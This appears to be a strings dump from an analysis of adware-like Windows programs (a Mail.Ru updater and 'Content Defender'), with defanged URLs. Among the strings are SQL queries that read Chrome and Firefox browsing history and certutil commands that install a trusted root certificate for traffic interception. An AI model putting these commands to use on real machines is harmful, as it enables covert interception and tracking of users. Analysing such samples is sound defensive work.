software_reporter_tool.log
Error parsing reporter logs:
dFailed to update SwReporter data:
since_last_exec
chrome
hXXp://xml.binupdate.mail.ru/tasks/ext_settings.mrdj?
Terminating update.exe
update.exe
hXXp://xml.binupdate.mail.ru/sputnik/spmrids.mrdj?
\bmail\.ru\b
K{61EB20A4-D4D5-4276-A2C9-DCCE8CE9F633}
{A55F9C95-2BB1-4EA2-BC77-DFAAB78832CE}
qip.ru
Start proceed Google Chrome
Google Chrome is done
Google Chrome is not done
Start proceed Firefox
Firefox is done
Firefox is not done
hXXp://xml.binupdate.mail.ru/tasks/sg_settings.mrdj?
hXXp://go.mail.ru/?chverfix=1&fr=chverfix_sg
hXXp://go.mail.ru/search?q={SearchTerms}&ieverfix=1&fr=ieverfix_dse
hXXp://xml.binupdate.mail.ru/tasks/sg_settings.mrdj
hXXp://xml.binupdate.mail.ru/sputnik/spmrids.mrdj successfully fetching failed
Svk.com/audios
ok.ru/music
my.mail.ru/music
e.mail.ru/messages/inbox
vk.com/app
ok.ru/game
ok.ru/app
my.mail.ru/app
games.mail.ru
SELECT id, url, last_visit_time FROM urls where url like '%%%1%%%' order by last_visit_time DESC limit 1
SELECT url, last_visit_date FROM moz_places where url like '%%%1%%%' and guid != '' and guid notnull order by last_visit_date desc limit 1
\Toolbar\Custom\Packages\hXXp://bar-widgets.yandex.ru/packages/approved/176/manifest.xml\Components\smartbox
Yandex\Toolbar\state.json
yasearch-xb\plugins.json
Software\Mail.Ru\Updater
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
uac-passed
Kamigo_tmp.exe
hXXp://binupdate.mail.ru/amigo/version2.xml
internet_tmp.exe
hXXp://binupdate.mail.ru/chrome/version3.xml
internetupdater_tmp.exe
hXXp://binupdate.mail.ru/chrome/version2.xml
0.0.0.0
inttoam_tmp.exe
hXXp://binupdate.mail.ru/chrome/internet_to_amigo.xml
28.0.1501.430
hXXp://binupdate.mail.ru/updater/version.xml
mrutmp.exe
.mru_update_service
C:\logging
amsg
last_chrome
ovr_chrome
Google/Chrome/User Data/Default/History
hXXp://xml.binupdate.mail.ru/friends.mrdj
oUpdater.Mail.Ru
Mail.Ru Group
Updater.Mail.Ru exist
Updater.Mail.Ru: Error during coping file, rc =
Service::Update update operation is proceed
Updater.Mail.Ru: StartService: RegisterServiceCtrlHandler returned error
Updater.Mail.Ru: StartService: SetServiceStatus returned error
Updater.Mail.Ru: SERVICE_CONTROL_STOP
Updater.Mail.Ru: SERVICE_CONTROL_INTERROGATE
Updater.Mail.Ru: SERVICE_CONTROL_SHUTDOWN
%1% (%2%)
\StringFileInfo\xx
notepad.exe
SOFTWARE/Microsoft/Windows/CurrentVersion/Policies/System
0123456789 ,.
Software/Microsoft/Windows/CurrentVersion/Explorer/Shell Folders
sqlite3_prepare16_v2
sqlite3_step
sqlite3
SQLite error %1% returned by %2%
SQLite error code %1%, file %2%
sAbsolutePath: <%s>
Incorrect firefox js file
stub.exe
hXXp://xml.binupdate.mail.ru/tenv.mrdj
filter.cfg
metrics.csv
http.csv
%Y%m%d
%Y-%m-%d
%H:%M:%S
%Y%m%dT%H%M%S%F%q
%Y-%m-%d %H:%M:%S%F%Q
%Y-%b-%d %H:%M:%S%F %z
%O:%M:%S%F
Invalid url
jMail.ru/ifrm
SOFTWARE/Mail.ru
Internet Explorer/iexplore.exe
Global\651CB287-2277-4F76-84C6-1D61E868304B
Mail.ru/CommonCache
HTTP code %1%
%Y-%b-%d
l%Y%m%d
SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/Shell Folders
asio-58CCDC44-6264-4842-90C2-F3C545CB8AA7-%u-%p
hXXp://xml.binupdate.mail.ru/cache_policy.mrdj
rCachingPolicy/Urls
mscoree.dll
madvapi32.dll
skernel32.dll
combase.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
portuguese-brazilian
888816666554443
6666554443
!6666554443
%5N.log
%Program Files%\Mail.Ru\MailRuUpdater\MailRuUpdater.exe
Mail.Ru updater
1.17.0.150

cd.exe_1264:

.text
`.rdata
@.data
.rsrc
@.reloc
w%s( 
}.hD]F
?%u4W
Certificate name reading failed
Certificate %s, Is our: %s
Certificate deleted
Certificate deletion failed
Store %s opening %s
Check folder for certificate:
cert8.db
Can't open category key
For category %s enable %s detected
----------------- Domains in category %s-----------------
Category %s enabled: %s
FAdvapi32.dll
RegOpenKeyTransactedA
RegCreateKeyTransactedA
RegDeleteKeyTransactedA
FRegDeleteKeyExA
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
{3E0DB45B-9FCC-4064-B48C-080BD03A99A4}
HTTP/1.1 404 Not OK
<html><body bgcolor=#f0f0f0><center><h1>Web Content Blocked by Content Defender</h1></center><script type="text/javascript">new Image().src ='//contentdefender-cis5.org/blockedpage/log/?' Math.random();</script></body></html>" <!-- - Unfortunately, Microsoft has added a clever new - 'feature' to Internet Explorer. If the text of - an error's message is 'too small', specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - 'smart error messages'. That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->
HTTP/1.1 204 No Content
Content type for endpoint %u is %s
\Content Defender\nss\certutil.exe -D -n "ContentDefender 2" -d
\Content Defender\cert
2.5.4.3
Certificate Name is
/version/%uu
cert
Invalid JSON array: %c%c%c%c
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
{"level":"%u","type":"%u","process":"ContentDefender","text":"%s","os":"Windows %u.%u %u bit",
Content-type:application/x-www-form-urlencoded; charset=utf8
Checking for process id: %u
Process with id %u recognized as %s
%s %u.%u
opera
firefox
https
HTTP/1.1
Code detected as error: %s
ConDefSetup.exe
url: %s code: %s
{"os":"Windows %u.%u",
"%s",
Content-type:application/x-www-form-urlencoded
Mscoree.dll
successurl
hXXp://contentdefender-cis1.org/data/get/
hXXp://contentdefender-cis1.org/error/index/
hXXp://contentdefender-cis1.org
contentdefender-cis1.org
condef.sys
hXXp://contentdefender-cis1.org/version/checknew/
hXXp://contentdefender-cis2.org
hXXp://contentdefender-cis3.org
hXXp://contentdefender-cis4.org
hXXp://contentdefender-cis5.org
%s open failed, code %u
Domain filtering: %s Words filtering: %s
%u badwords detected
Opening of words key failed
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
GetProcessWindowStation
\\.\CtrlSM
system32\drivers\%s.sys
SYSTEM\CurrentControlSet\Services\%s
Tcpip
SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
Wtsapi32.dll
SSL\SSLDataProvider.cpp
critical,keyCertSign,cRLSign
%s-%s#ss
%s-%s-%s#child
1.3.6.1.5.5.7.3.1
1.3.6.1.4.1.311.10.3.3
2.16.840.1.113730.4.1
127.0.0.1
HTTP/1.
http/1.
PORT
504 Unsupported transfer mode
504 Unsupported command
PORT
%s.%s.%s.%s:%d
%s:%s
[%s]:%s
File-Count: %d
Total-Bytes: %d
File-Name: %s
{0946134E-4C7F-11D1-8222-444553540000}
C:\prg\ContentDefender\Release\cd.pdb
GetProcessHeap
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyExA
ReportEventA
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyW
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
InternetCanonicalizeUrlA
InternetOpenUrlA
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
WININET.dll
PSAPI.DLL
VERSION.dll
CertOpenStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertFreeCertificateContext
CertDeleteCertificateFromStore
CertEnumSystemStore
CertGetNameStringA
CertCreateContext
CRYPT32.dll
WS2_32.dll
SSLEAY32.dll
LIBEAY32.dll
GetCPInfo
CertAddEncodedCertificateToStore
CertGetCertificateChain
CertVerifyCertificateChainPolicy
CertFreeCertificateChain
CertOpenSystemStoreA
CertFindCertificateInStore
CertAddCertificateContextToStore
PFXExportCertStoreEx
zcÁ
.?AV?$CAtlExeModuleT@VCContentDefenderModule@@@ATL@@
.?AVHttpFilter@@
.?AVCUrlChecker@@
.?AVHTTPFilter@ProtocolFilters@@
.?AVSMTPFilter@ProtocolFilters@@
.?AVFTPFilter@ProtocolFilters@@
.?AVFTPDataFilter@ProtocolFilters@@
200075929
%Program Files%\Content Defender\cd.exe
ForceRemove {9B7395C3-28B5-445E-AA7D-539B63514CAB} = s 'DefenderControl Class'
val ServerExecutable = s '%MODULE_RAW%'
TypeLib = s '{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}'
&iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2014 (Windows)" xmpMM:InstanceID="xmp.iid:3B9314F8140A11E5B8C2F69F2352A95D" xmpMM:DocumentID="xmp.did:3B9314F9140A11E5B8C2F69F2352A95D"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3B9314F6140A11E5B8C2F69F2352A95D" stRef:documentID="xmp.did:3B9314F7140A11E5B8C2F69F2352A95D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2014 (Windows)" xmpMM:InstanceID="xmp.iid:7B9A72D8140B11E589ACF650979FF142" xmpMM:DocumentID="xmp.did:7B9A72D9140B11E589ACF650979FF142"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7B9A72D6140B11E589ACF650979FF142" stRef:documentID="xmp.did:7B9A72D7140B11E589ACF650979FF142"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
stdole2.tlbWWW
Created by MIDL version 7.00.0555 at Fri Dec 11 20:39:45 2015
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS></application></compatibility></assembly>
9%9/999]9
4 5*595}5
5!5%5)5-5
0!0-030A0M0S0a0g0q0}0
8 8(808<8`8
sOLEAUT32.DLL
C{3E0DB45B-9FCC-4064-B48C-080BD03A99A4}
combase.dll
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
\*.cer
\cert.db
\x.db
\xtls.db
\xv.db
nss\certutil -A -t "TCu" -i "
opcacrt6.dat
ca-certs
%Program Files%\Content Defender\cert
1.18.0.1
ContentDefender.exe

05a00036.exe_284:

.text
`.itext
`.data
.idata
.didata
.rdata
@.rsrc
TArray<System.Byte>
TArray<System.Char>
TArray<System.Word>
TArray<System.ShortInt>
TArray<System.SmallInt>
TArray<System.Integer>
TArray<System.Int64>
TArray<System.TPtrWrapper>
System.Types
HKEY
!"#$%&'(!)* ,-./0'
System.SysUtils
ENoMonitorSupportException
TArray<System.SysUtils.TLangRec>
IEnumerable<System.string>0!
TArray<System.string>
TMarshaller.PDisposeRec
TMarshaller.TDisposeProc
TMarshaller.TDisposeRec
TMarshaller.IDisposer
TMarshaller.TDisposer'
TMarshaller.TDisposer
/TArray<System.SysUtils.TMarshaller.TDisposeRec>
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
System.SysUtilsL
&TArray<System.SysUtils.TUnitHashEntry>
System.Variants
Operator
EVariantBadIndexError<t
EVariantBadIndexError
System.Variantsdo
System.SyncObjs
System.Generics.Defaults
IEqualityComparer<System.string>
IComparer<System.string>
TCustomComparer<System.string>
System.Generics.Collections
doOwnsKeys
System.Rtti
GetIndexedProperties
GetIndexedProperty
GetDeclaredIndexedProperties
TMethodImplementation.TFloatReg
):TMethodImplementation.TInterceptFrame.:1
%TMethodImplementation.TInterceptFrame(
*TMethodImplementation.TFirstStageIntercept
%TMethodImplementation.PInterceptFrame
*TMethodImplementation.PFirstStageIntercept
TMethodImplementation.TParamLoc
!TMethodImplementation.TInvokeInfoK
!TMethodImplementation.TInvokeInfopN
TRttiIndexedPropertyS
TRttiIndexedProperty
FIndexedProps
TArray<System.TCustomAttribute>
-TFunc<System.TArray<System.TCustomAttribute>>
TArray<System.Rtti.TRttiMethod>
TArray<System.Rtti.TRttiField>
!TArray<System.Rtti.TRttiProperty>
(TArray<System.Rtti.TRttiIndexedProperty>
%TArray<System.Rtti.TRttiManagedField>
TArray<System.Rtti.TValue>
3TArray<System.Rtti.TMethodImplementation.TParamLoc>
8TEnumerator<System.Rtti.TMethodImplementation.TParamLoc>(
8TEnumerator<System.Rtti.TMethodImplementation.TParamLoc>
8TEnumerable<System.Rtti.TMethodImplementation.TParamLoc>-
8TEnumerable<System.Rtti.TMethodImplementation.TParamLoc>@}
;TList<System.Rtti.TMethodImplementation.TParamLoc>.arrayofT
6IComparer<System.Rtti.TMethodImplementation.TParamLoc>
CTCollectionNotifyEvent<System.Rtti.TMethodImplementation.TParamLoc>
:TArrayManager<System.Rtti.TMethodImplementation.TParamLoc>g
:TArrayManager<System.Rtti.TMethodImplementation.TParamLoc>
8IEnumerable<System.Rtti.TMethodImplementation.TParamLoc>0!
=TList<System.Rtti.TMethodImplementation.TParamLoc>.TEmptyFunc
>TList<System.Rtti.TMethodImplementation.TParamLoc>.TEnumerator5
>TList<System.Rtti.TMethodImplementation.TParamLoc>.TEnumerator
2TList<System.Rtti.TMethodImplementation.TParamLoc>&
2TList<System.Rtti.TMethodImplementation.TParamLoc>
"TArray<System.Rtti.TRttiParameter>
&TArray<System.Rtti.TRttiInterfaceType>
-TPair<System.Pointer,System.Rtti.TRttiObject>
AKey
ATArray<System.Rtti.TPair<System.Pointer,System.Rtti.TRttiObject>>
FTEnumerator<System.Rtti.TPair<System.Pointer,System.Rtti.TRttiObject>>(
FTEnumerator<System.Rtti.TPair<System.Pointer,System.Rtti.TRttiObject>>d
FTEnumerable<System.Rtti.TPair<System.Pointer,System.Rtti.TRttiObject>>-
FTEnumerable<System.Rtti.TPair<System.Pointer,System.Rtti.TRttiObject>>
9TDictionary<System.Pointer,System.Rtti.TRttiObject>.TItem
>TDictionary<System.Pointer,System.Rtti.TRttiObject>.TItemArray
System.Generics.Collections(
!IEqualityComparer<System.Pointer>
&TCollectionNotifyEvent<System.Pointer>
/TCollectionNotifyEvent<System.Rtti.TRttiObject>
TArray<System.Pointer>
TEnumerator<System.Pointer>(
TEnumerator<System.Pointer>
TEnumerable<System.Pointer>-
TEnumerable<System.Pointer>
BTDictionary<System.Pointer,System.Rtti.TRttiObject>.TKeyEnumerator;
BTDictionary<System.Pointer,System.Rtti.TRttiObject>.TKeyEnumerator
BTDictionary<System.Pointer,System.Rtti.TRttiObject>.TKeyCollection;
BTDictionary<System.Pointer,System.Rtti.TRttiObject>.TKeyCollection
TArray<System.Rtti.TRttiObject>
$TEnumerator<System.Rtti.TRttiObject>(
$TEnumerator<System.Rtti.TRttiObject>@
$TEnumerable<System.Rtti.TRttiObject>-
$TEnumerable<System.Rtti.TRttiObject>
DTDictionary<System.Pointer,System.Rtti.TRttiObject>.TValueEnumerator;
DTDictionary<System.Pointer,System.Rtti.TRttiObject>.TValueEnumerator
DTDictionary<System.Pointer,System.Rtti.TRttiObject>.TValueCollection;
DTDictionary<System.Pointer,System.Rtti.TRttiObject>.TValueCollection
CTDictionary<System.Pointer,System.Rtti.TRttiObject>.TPairEnumerator;
CTDictionary<System.Pointer,System.Rtti.TRttiObject>.TPairEnumerator
FOnKeyNotify
FKeyCollection
3TDictionary<System.Pointer,System.Rtti.TRttiObject>9
ContainsKey
3TDictionary<System.Pointer,System.Rtti.TRttiObject>
Keys
OnKeyNotify0
TArray<System.Rtti.TRttiType>
TArray<System.Rtti.TRttiPackage>
-TPair<System.TypInfo.PTypeInfo,System.string>
ATArray<System.Rtti.TPair<System.TypInfo.PTypeInfo,System.string>>
FTEnumerator<System.Rtti.TPair<System.TypInfo.PTypeInfo,System.string>>(
FTEnumerator<System.Rtti.TPair<System.TypInfo.PTypeInfo,System.string>>
FTEnumerable<System.Rtti.TPair<System.TypInfo.PTypeInfo,System.string>>-
FTEnumerable<System.Rtti.TPair<System.TypInfo.PTypeInfo,System.string>>D
9TDictionary<System.TypInfo.PTypeInfo,System.string>.TItem
>TDictionary<System.TypInfo.PTypeInfo,System.string>.TItemArray
 IEqualityComparer<System.TypInfo.PTypeInfo>
0TCollectionNotifyEvent<System.TypInfo.PTypeInfo>
%TCollectionNotifyEvent<System.string>
TArray<System.TypInfo.PTypeInfo>
%TEnumerator<System.TypInfo.PTypeInfo>(
%TEnumerator<System.TypInfo.PTypeInfo>
%TEnumerable<System.TypInfo.PTypeInfo>-
%TEnumerable<System.TypInfo.PTypeInfo>4
BTDictionary<System.TypInfo.PTypeInfo,System.string>.TKeyEnumerator;
BTDictionary<System.TypInfo.PTypeInfo,System.string>.TKeyEnumerator
BTDictionary<System.TypInfo.PTypeInfo,System.string>.TKeyCollection;
BTDictionary<System.TypInfo.PTypeInfo,System.string>.TKeyCollection|
TEnumerator<System.string>(
TEnumerator<System.string>
TEnumerable<System.string>-
TEnumerable<System.string>
DTDictionary<System.TypInfo.PTypeInfo,System.string>.TValueEnumerator;
DTDictionary<System.TypInfo.PTypeInfo,System.string>.TValueEnumerator
DTDictionary<System.TypInfo.PTypeInfo,System.string>.TValueCollection;
DTDictionary<System.TypInfo.PTypeInfo,System.string>.TValueCollection
CTDictionary<System.TypInfo.PTypeInfo,System.string>.TPairEnumerator;
CTDictionary<System.TypInfo.PTypeInfo,System.string>.TPairEnumerator
3TDictionary<System.TypInfo.PTypeInfo,System.string>9
3TDictionary<System.TypInfo.PTypeInfo,System.string>
OnKeyNotify
-TPair<System.string,System.TypInfo.PTypeInfo>
ATArray<System.Rtti.TPair<System.string,System.TypInfo.PTypeInfo>>
FTEnumerator<System.Rtti.TPair<System.string,System.TypInfo.PTypeInfo>>(
FTEnumerator<System.Rtti.TPair<System.string,System.TypInfo.PTypeInfo>>
FTEnumerable<System.Rtti.TPair<System.string,System.TypInfo.PTypeInfo>>-
FTEnumerable<System.Rtti.TPair<System.string,System.TypInfo.PTypeInfo>><
9TDictionary<System.string,System.TypInfo.PTypeInfo>.TItem
>TDictionary<System.string,System.TypInfo.PTypeInfo>.TItemArray
System.Generics.Collections|
BTDictionary<System.string,System.TypInfo.PTypeInfo>.TKeyEnumerator;
BTDictionary<System.string,System.TypInfo.PTypeInfo>.TKeyEnumerator
BTDictionary<System.string,System.TypInfo.PTypeInfo>.TKeyCollection;
BTDictionary<System.string,System.TypInfo.PTypeInfo>.TKeyCollection
DTDictionary<System.string,System.TypInfo.PTypeInfo>.TValueEnumerator;
DTDictionary<System.string,System.TypInfo.PTypeInfo>.TValueEnumerator
DTDictionary<System.string,System.TypInfo.PTypeInfo>.TValueCollection;
DTDictionary<System.string,System.TypInfo.PTypeInfo>.TValueCollection
CTDictionary<System.string,System.TypInfo.PTypeInfo>.TPairEnumerator;
CTDictionary<System.string,System.TypInfo.PTypeInfo>.TPairEnumerator
3TDictionary<System.string,System.TypInfo.PTypeInfo>9
3TDictionary<System.string,System.TypInfo.PTypeInfo>
#IComparer<System.Rtti.TRttiPackage>
%TComparison<System.Rtti.TRttiPackage>
#TComparer<System.Rtti.TRttiPackage>2
#TComparer<System.Rtti.TRttiPackage>
$TEnumerator<System.TCustomAttribute>(
$TEnumerator<System.TCustomAttribute>4?
$TEnumerable<System.TCustomAttribute>-
$TEnumerable<System.TCustomAttribute>t@
'TList<System.TCustomAttribute>.arrayofT
"IComparer<System.TCustomAttribute>
/TCollectionNotifyEvent<System.TCustomAttribute>
&TArrayManager<System.TCustomAttribute>g
&TArrayManager<System.TCustomAttribute>DC
$IEnumerable<System.TCustomAttribute>0!
)TList<System.TCustomAttribute>.TEmptyFunc
*TList<System.TCustomAttribute>.TEnumerator5
*TList<System.TCustomAttribute>.TEnumerator8F
TList<System.TCustomAttribute>&
TList<System.TCustomAttribute>
-TArray<System.TArray<System.Rtti.TRttiField>>
7TArray<System.TArray<System.Rtti.TRttiIndexedProperty>>
.TArray<System.TArray<System.Rtti.TRttiMethod>>
0TArray<System.TArray<System.Rtti.TRttiProperty>>
&TEnumerator<System.Rtti.TRttiProperty>(
&TEnumerator<System.Rtti.TRttiProperty>
&TEnumerable<System.Rtti.TRttiProperty>-
&TEnumerable<System.Rtti.TRttiProperty>X
)TList<System.Rtti.TRttiProperty>.arrayofT
$IComparer<System.Rtti.TRttiProperty>
1TCollectionNotifyEvent<System.Rtti.TRttiProperty>
(TArrayManager<System.Rtti.TRttiProperty>g
(TArrayManager<System.Rtti.TRttiProperty>4
&IEnumerable<System.Rtti.TRttiProperty>0!
 TList<System.Rtti.TRttiProperty>.TEmptyFunc
,TList<System.Rtti.TRttiProperty>.TEnumerator5
,TList<System.Rtti.TRttiProperty>.TEnumerator,
TList<System.Rtti.TRttiProperty>&
TList<System.Rtti.TRttiProperty>
$TEnumerator<System.Rtti.TRttiMethod>(
$TEnumerator<System.Rtti.TRttiMethod>
$TEnumerable<System.Rtti.TRttiMethod>-
$TEnumerable<System.Rtti.TRttiMethod>
'TList<System.Rtti.TRttiMethod>.arrayofT
"IComparer<System.Rtti.TRttiMethod>
/TCollectionNotifyEvent<System.Rtti.TRttiMethod>
&TArrayManager<System.Rtti.TRttiMethod>g
&TArrayManager<System.Rtti.TRttiMethod>
$IEnumerable<System.Rtti.TRttiMethod>0!
)TList<System.Rtti.TRttiMethod>.TEmptyFunc
*TList<System.Rtti.TRttiMethod>.TEnumerator5
*TList<System.Rtti.TRttiMethod>.TEnumerator
TList<System.Rtti.TRttiMethod>&
TList<System.Rtti.TRttiMethod>p
#TEnumerator<System.Rtti.TRttiField>(
#TEnumerator<System.Rtti.TRttiField>D
#TEnumerable<System.Rtti.TRttiField>-
#TEnumerable<System.Rtti.TRttiField>
&TList<System.Rtti.TRttiField>.arrayofT
System.Generics.Collections\@
!IComparer<System.Rtti.TRttiField>
.TCollectionNotifyEvent<System.Rtti.TRttiField>
%TArrayManager<System.Rtti.TRttiField>g
%TArrayManager<System.Rtti.TRttiField>L
#IEnumerable<System.Rtti.TRttiField>0!
(TList<System.Rtti.TRttiField>.TEmptyFunc
)TList<System.Rtti.TRttiField>.TEnumerator5
)TList<System.Rtti.TRttiField>.TEnumerator<
TList<System.Rtti.TRttiField>&
TList<System.Rtti.TRttiField>
*TEnumerator<System.Rtti.TRttiManagedField>(
*TEnumerator<System.Rtti.TRttiManagedField>
*TEnumerable<System.Rtti.TRttiManagedField>-
*TEnumerable<System.Rtti.TRttiManagedField>
-TList<System.Rtti.TRttiManagedField>.arrayofT
System.Generics.CollectionsXA
(IComparer<System.Rtti.TRttiManagedField>
5TCollectionNotifyEvent<System.Rtti.TRttiManagedField>
,TArrayManager<System.Rtti.TRttiManagedField>g
,TArrayManager<System.Rtti.TRttiManagedField>
*IEnumerable<System.Rtti.TRttiManagedField>0!
/TList<System.Rtti.TRttiManagedField>.TEmptyFunc
0TList<System.Rtti.TRttiManagedField>.TEnumerator5
0TList<System.Rtti.TRttiManagedField>.TEnumerator
$TList<System.Rtti.TRttiManagedField>&
$TList<System.Rtti.TRttiManagedField>
9TObjectDictionary<System.Pointer,System.Rtti.TRttiObject>M
9TObjectDictionary<System.Pointer,System.Rtti.TRttiObject>\/
8TComparison<System.Rtti.TMethodImplementation.TParamLoc>
6TComparer<System.Rtti.TMethodImplementation.TParamLoc>2
6TComparer<System.Rtti.TMethodImplementation.TParamLoc>0
>TMoveArrayManager<System.Rtti.TMethodImplementation.TParamLoc>g
>TMoveArrayManager<System.Rtti.TMethodImplementation.TParamLoc>
ITList<System.Rtti.TPair<System.Pointer,System.Rtti.TRttiObject>>.arrayofT
DIComparer<System.Rtti.TPair<System.Pointer,System.Rtti.TRttiObject>>
QTCollectionNotifyEvent<System.Rtti.TPair<System.Pointer,System.Rtti.TRttiObject>>
Item-TPair<System.Pointer,System.Rtti.TRttiObject>
HTArrayManager<System.Rtti.TPair<System.Pointer,System.Rtti.TRttiObject>>g
HTArrayManager<System.Rtti.TPair<System.Pointer,System.Rtti.TRttiObject>>
FIEnumerable<System.Rtti.TPair<System.Pointer,System.Rtti.TRttiObject>>0!
KTList<System.Rtti.TPair<System.Pointer,System.Rtti.TRttiObject>>.TEmptyFunc
LTList<System.Rtti.TPair<System.Pointer,System.Rtti.TRttiObject>>.TEnumerator5
LTList<System.Rtti.TPair<System.Pointer,System.Rtti.TRttiObject>>.TEnumerator
@TList<System.Rtti.TPair<System.Pointer,System.Rtti.TRttiObject>>&
@TList<System.Rtti.TPair<System.Pointer,System.Rtti.TRttiObject>>
TList<System.Pointer>.arrayofT
IComparer<System.Pointer>
TArrayManager<System.Pointer>g
TArrayManager<System.Pointer>
IEnumerable<System.Pointer>0!
TList<System.Pointer>.TEmptyFunc
!TList<System.Pointer>.TEnumerator5
!TList<System.Pointer>.TEnumerator
TList<System.Pointer>&
TList<System.Pointer>
'TList<System.Rtti.TRttiObject>.arrayofT
System.Generics.CollectionsD4
"IComparer<System.Rtti.TRttiObject>
&TArrayManager<System.Rtti.TRttiObject>g
&TArrayManager<System.Rtti.TRttiObject>
$IEnumerable<System.Rtti.TRttiObject>0!
)TList<System.Rtti.TRttiObject>.TEmptyFunc
*TList<System.Rtti.TRttiObject>.TEnumerator5
*TList<System.Rtti.TRttiObject>.TEnumerator
TList<System.Rtti.TRttiObject>&
TList<System.Rtti.TRttiObject>
ITList<System.Rtti.TPair<System.TypInfo.PTypeInfo,System.string>>.arrayofT
System.Generics.Collectionsh
DIComparer<System.Rtti.TPair<System.TypInfo.PTypeInfo,System.string>>
QTCollectionNotifyEvent<System.Rtti.TPair<System.TypInfo.PTypeInfo,System.string>>
Item-TPair<System.TypInfo.PTypeInfo,System.string>
HTArrayManager<System.Rtti.TPair<System.TypInfo.PTypeInfo,System.string>>g
HTArrayManager<System.Rtti.TPair<System.TypInfo.PTypeInfo,System.string>>
FIEnumerable<System.Rtti.TPair<System.TypInfo.PTypeInfo,System.string>>0!
KTList<System.Rtti.TPair<System.TypInfo.PTypeInfo,System.string>>.TEmptyFunc
LTList<System.Rtti.TPair<System.TypInfo.PTypeInfo,System.string>>.TEnumerator5
LTList<System.Rtti.TPair<System.TypInfo.PTypeInfo,System.string>>.TEnumerator
@TList<System.Rtti.TPair<System.TypInfo.PTypeInfo,System.string>>&
@TList<System.Rtti.TPair<System.TypInfo.PTypeInfo,System.string>>
(TList<System.TypInfo.PTypeInfo>.arrayofT
System.Generics.Collections@
#IComparer<System.TypInfo.PTypeInfo>
'TArrayManager<System.TypInfo.PTypeInfo>g
'TArrayManager<System.TypInfo.PTypeInfo>
%IEnumerable<System.TypInfo.PTypeInfo>0!
*TList<System.TypInfo.PTypeInfo>.TEmptyFunc
 TList<System.TypInfo.PTypeInfo>.TEnumerator5
 TList<System.TypInfo.PTypeInfo>.TEnumerator
TList<System.TypInfo.PTypeInfo>&
TList<System.TypInfo.PTypeInfo>
TList<System.string>.arrayofT
TArrayManager<System.string>g
TArrayManager<System.string>
TList<System.string>.TEmptyFunc
TList<System.string>.TEnumerator5
TList<System.string>.TEnumeratord.
TList<System.string>&
TList<System.string>
ITList<System.Rtti.TPair<System.string,System.TypInfo.PTypeInfo>>.arrayofT
System.Generics.Collections`
DIComparer<System.Rtti.TPair<System.string,System.TypInfo.PTypeInfo>>
